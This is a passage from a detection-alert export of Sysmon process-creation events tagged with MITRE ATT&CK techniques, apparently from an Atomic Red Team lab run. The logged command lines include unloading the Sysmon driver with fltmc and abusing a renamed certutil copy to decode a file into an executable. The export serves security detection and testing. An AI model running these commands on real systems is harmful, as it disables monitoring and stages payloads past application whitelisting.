<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;fltmc.exe unload SysmonDrv&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.715974Z"">
</TimeCreated>
<EventRecordID>4074</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.696</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-0010C21F3D00</Data>
<Data Name=""ProcessId"">3976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;fltmc.exe unload SysmonDrv&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.643015Z"">
</TimeCreated>
<EventRecordID>4073</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.529</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010E16B3C00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.361122Z"">
</TimeCreated>
<EventRecordID>4069</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.346</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010565D3C00</Data>
<Data Name=""ProcessId"">3932</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA40-5D31-0000-0010CF5A3C00</Data>
<Data Name=""ParentProcessId"">4336</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.333864Z"">
</TimeCreated>
<EventRecordID>4068</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.316</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010CF5A3C00</Data>
<Data Name=""ProcessId"">4336</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.294575Z"">
</TimeCreated>
<EventRecordID>4067</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.256</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010B1553C00</Data>
<Data Name=""ProcessId"">5168</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA40-5D31-0000-00106A543C00</Data>
<Data Name=""ParentProcessId"">6572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.270645Z"">
</TimeCreated>
<EventRecordID>4066</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.236</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-00106A543C00</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.210561Z"">
</TimeCreated>
<EventRecordID>4065</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.938</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-0010813E3C00</Data>
<Data Name=""ProcessId"">7140</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
</TimeCreated>
<EventRecordID>4064</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -decode file.txt c:\file.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ParentProcessId"">4020</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) tried decoding file or information,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
</TimeCreated>
<EventRecordID>4064</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -decode file.txt c:\file.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ParentProcessId"">4020</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
</TimeCreated>
<EventRecordID>4064</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -decode file.txt c:\file.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ParentProcessId"">4020</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
